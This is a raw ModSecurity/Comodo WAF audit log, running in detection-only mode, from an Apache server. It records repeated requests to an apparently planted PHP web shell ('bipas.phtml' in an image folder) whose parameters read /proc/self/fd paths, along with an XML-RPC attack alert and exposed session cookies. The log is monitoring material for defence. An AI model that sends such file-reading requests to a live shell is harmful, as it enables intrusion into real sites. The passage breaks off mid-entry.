[file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/129"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/129"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5WFCTF37l_jAzt4odOwAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120792666840 4953 (- - -) Stopwatch2: 1750120792666840 4953; combined=2733, p1=414, p2=2159, p3=53, p4=39, p5=68, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9cce0562-Z-- --cdcc6674-A-- [17/Jun/2025:06:09:53.582939 +0530] aFC5WX4j6VFpohzeqUMWWwAAAAo 216.73.216.240 58706 127.0.0.1 7081 --cdcc6674-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F118 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --cdcc6674-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2990 Connection: close Content-Type: text/html; charset=UTF-8 --cdcc6674-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/118"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/118"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5WX4j6VFpohzeqUMWWwAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120793578473 4520 (- - -) Stopwatch2: 1750120793578473 4520; combined=2389, p1=389, p2=1862, p3=47, p4=34, p5=56, sr=109, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cdcc6674-Z-- --a04a3f72-A-- [17/Jun/2025:06:09:54.041118 +0530] aFC5WlJfblPUQiSn5r2cCQAAAAA 216.73.216.240 58772 127.0.0.1 7081 --a04a3f72-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F175 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --a04a3f72-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2990 Connection: close Content-Type: text/html; charset=UTF-8 --a04a3f72-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/175"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/175"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5WlJfblPUQiSn5r2cCQAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120794036846 4326 (- - -) Stopwatch2: 1750120794036846 4326; combined=2265, p1=348, p2=1781, p3=41, p4=39, p5=56, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a04a3f72-Z-- --925e142d-A-- [17/Jun/2025:06:09:55.690511 +0530] aFC5W1CTF37l_jAzt4odQAAAAAU 216.73.216.240 58982 127.0.0.1 7081 --925e142d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F148 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --925e142d-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2990 Connection: close Content-Type: text/html; charset=UTF-8 --925e142d-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/148"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/148"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5W1CTF37l_jAzt4odQAAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120795686345 4221 (- - -) Stopwatch2: 1750120795686345 4221; combined=2284, p1=343, p2=1808, p3=38, p4=34, p5=61, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --925e142d-Z-- --386b5875-A-- [17/Jun/2025:06:09:58.616183 +0530] aFC5Xmj9J38fG6WAr4picwAAAAk 216.73.216.240 59346 127.0.0.1 7081 --386b5875-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F116 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --386b5875-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2990 Connection: close Content-Type: text/html; charset=UTF-8 --386b5875-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/116"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/116"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5Xmj9J38fG6WAr4picwAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120798611698 4558 (- - -) Stopwatch2: 1750120798611698 4558; combined=2306, p1=438, p2=1706, p3=35, p4=44, p5=83, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --386b5875-Z-- --b57d1e5e-A-- [17/Jun/2025:06:10:01.992751 +0530] aFC5YdyZ4SMykfn97vzB3QAAAAs 216.73.216.240 37640 127.0.0.1 7081 --b57d1e5e-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F93 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --b57d1e5e-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2988 Connection: close Content-Type: text/html; charset=UTF-8 --b57d1e5e-H-- Message: Warning. Matched phrase "proc/self/fd/9" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/9 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/93"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/9" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/9 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/93"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5YdyZ4SMykfn97vzB3QAAAAs"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120801986841 5992 (- - -) Stopwatch2: 1750120801986841 5992; combined=3282, p1=496, p2=2600, p3=52, p4=49, p5=85, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b57d1e5e-Z-- --acd4c322-A-- [17/Jun/2025:06:10:04.083995 +0530] aFC5ZIiFNOCfBactc_VFpAAAAAE 216.73.216.240 37892 127.0.0.1 7081 --acd4c322-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F78 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --acd4c322-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2989 Connection: close Content-Type: text/html; charset=UTF-8 --acd4c322-H-- Message: Warning. Matched phrase "proc/self/fd/7" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/7 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/78"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/7" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/7 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/78"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5ZIiFNOCfBactc_VFpAAAAAE"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120804079253 4797 (- - -) Stopwatch2: 1750120804079253 4797; combined=2505, p1=360, p2=2010, p3=37, p4=37, p5=61, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --acd4c322-Z-- --98790531-A-- [17/Jun/2025:06:10:05.448548 +0530] aFC5Ze3Ib0Hp5z3ImsFoOwAAAAc 216.73.216.240 38070 127.0.0.1 7081 --98790531-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F90 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --98790531-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2989 Connection: close Content-Type: text/html; charset=UTF-8 --98790531-H-- Message: Warning. Matched phrase "proc/self/fd/9" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/9 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/90"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/9" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/9 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/90"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5Ze3Ib0Hp5z3ImsFoOwAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120805443839 4781 (- - -) Stopwatch2: 1750120805443839 4781; combined=2535, p1=360, p2=2026, p3=43, p4=39, p5=67, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --98790531-Z-- --81224e41-A-- [17/Jun/2025:06:10:11.911818 +0530] aFC5awJ4p5Cdblnjra6ClgAAAAI 216.73.216.240 57824 127.0.0.1 7081 --81224e41-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F87 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --81224e41-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2989 Connection: close Content-Type: text/html; charset=UTF-8 --81224e41-H-- Message: Warning. Matched phrase "proc/self/fd/8" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/8 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/87"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/8" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/8 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/87"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5awJ4p5Cdblnjra6ClgAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120811907305 4568 (- - -) Stopwatch2: 1750120811907305 4568; combined=2403, p1=367, p2=1889, p3=38, p4=38, p5=71, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --81224e41-Z-- --5e5b7c00-A-- [17/Jun/2025:06:10:51.679759 +0530] aFC5ku3Ib0Hp5z3ImsFoUgAAAAc 146.190.105.35 52138 127.0.0.1 7081 --5e5b7c00-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 Cookie: PHPSESSID=2js2i18nui0ddle7s29vv5qgkd; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_5588064c6e2d03c4ef77bd6eb16b2e%7C%7C1750293650%7C%7C1750290050%7C%7C7ba48c4876901e49ff547b27e28f3023; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=b67b8e77c895b9734bc7bdc756e3eec7%7C%7C1750293650%7C%7C1750290050%7C%7Caa3500dcdaa83b8a1f36e92bf4de4ae0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --5e5b7c00-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=f9fnmqoio7k9v1kfmdeer08quk; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_62a93146bd5bb12509423de6c5a1ed%7C%7C1750293651%7C%7C1750290051%7C%7C1c0cf94315e2840d3ce48eee6cafe910; expires=Thu, 19 Jun 2025 00:40:51 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=3fb1c399554e020e6f5dc48033569ef9%7C%7C1750293651%7C%7C1750290051%7C%7C0854bbfde05b7730c98ce4e0f528b349; expires=Thu, 19 Jun 2025 00:40:51 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --5e5b7c00-E-- --5e5b7c00-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFC5ku3Ib0Hp5z3ImsFoUgAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750120850646649 1033212 (- - -) Stopwatch2: 1750120850646649 1033212; combined=3454, p1=524, p2=2441, p3=109, p4=57, p5=200, sr=204, sw=123, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5e5b7c00-Z-- --3a4db32b-A-- [17/Jun/2025:06:10:56.128612 +0530] aFC5mFJfblPUQiSn5r2cNAAAAAA 216.73.216.240 52558 127.0.0.1 7081 --3a4db32b-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F96 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --3a4db32b-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2989 Connection: close Content-Type: text/html; charset=UTF-8 --3a4db32b-H-- Message: Warning. Matched phrase "proc/self/fd/9" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/9 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/96"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/9" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/9 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/96"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5mFJfblPUQiSn5r2cNAAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120856124049 4619 (- - -) Stopwatch2: 1750120856124049 4619; combined=2455, p1=401, p2=1921, p3=36, p4=37, p5=60, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3a4db32b-Z-- --62b49567-A-- [17/Jun/2025:06:10:57.401694 +0530] aFC5mQJ4p5Cdblnjra6CrQAAAAI 216.73.216.240 52738 127.0.0.1 7081 --62b49567-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F12 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --62b49567-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2988 Connection: close Content-Type: text/html; charset=UTF-8 --62b49567-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/12"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/12"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5mQJ4p5Cdblnjra6CrQAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120857397073 4697 (- - -) Stopwatch2: 1750120857397073 4697; combined=2533, p1=409, p2=1975, p3=38, p4=35, p5=76, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --62b49567-Z-- --ffda7678-A-- [17/Jun/2025:06:10:58.675592 +0530] aFC5mmj9J38fG6WAr4pinAAAAAk 216.73.216.240 52876 127.0.0.1 7081 --ffda7678-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F197 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --ffda7678-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2990 Connection: close Content-Type: text/html; charset=UTF-8 --ffda7678-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file 